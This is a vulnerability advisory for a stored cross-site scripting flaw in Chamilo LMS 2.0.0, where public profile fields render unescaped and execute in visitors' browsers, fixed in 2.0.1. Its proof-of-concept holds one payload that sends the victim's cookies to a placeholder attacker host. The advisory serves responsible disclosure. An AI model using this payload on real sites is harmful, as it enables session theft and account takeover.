Chamilo LMS: Pre-auth stored XSS on the public profile page leads to account takeover

Advisory ID: TP-2026-025
Product: Chamilo LMS (open-source learning management system in PHP)
Vulnerability type: Stored cross-site scripting (CWE-79)
CVE: CVE-2026-45144
CVSS 3.1: 8.9 (High) · CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L
Affected versions: >= 2.0.0, < 2.0.1
Fixed in: 2.0.1
Vendor advisory: GHSA-9833-c7cj-x9xm
Reported: 23 April 2026

Summary

Chamilo LMS is a widely used open-source learning management system. The profile page GET /user/{username} is publicly accessible and renders six user-editable fields (firstname, lastname, competences, openarea, teach, diplomas) inside a {% autoescape false %} block in the Twig template, without encoding or sanitising the values server-side. An attacker with the student role (or even anonymous when self-registration is enabled) stores HTML in their profile, which then executes in the browser of any visitor, including administrators. Through theft of session, JWT or localStorage data this leads to full account takeover. turingpoint verified the flow and reported it responsibly; the vendor fixed it in 2.0.1.

Proof of Concept

The attacker (student role) places a crafted name field in their own profile:

firstname = <img src=x onerror=fetch('https://attacker.example/?c='+document.cookie)>

The victim (e.g. an administrator) opens the public profile page:
GET /user/<username>
-> The markup rendered inside the {% autoescape false %} block is parsed,
   the onerror handler fires in the application origin and exfiltrates
   the victim's session / JWT / localStorage data.

Because the template explicitly disables output encoding ({% autoescape false %}) and the fields are passed through without RichText::getSafeHtml(), the injected HTML stays live and executes when the profile page is opened.

References

• GHSA-9833-c7cj-x9xm
• CVE-2026-45144
• Fix commit: sanitise profile fields and harden template output
• Fix release: Chamilo LMS v2.0.1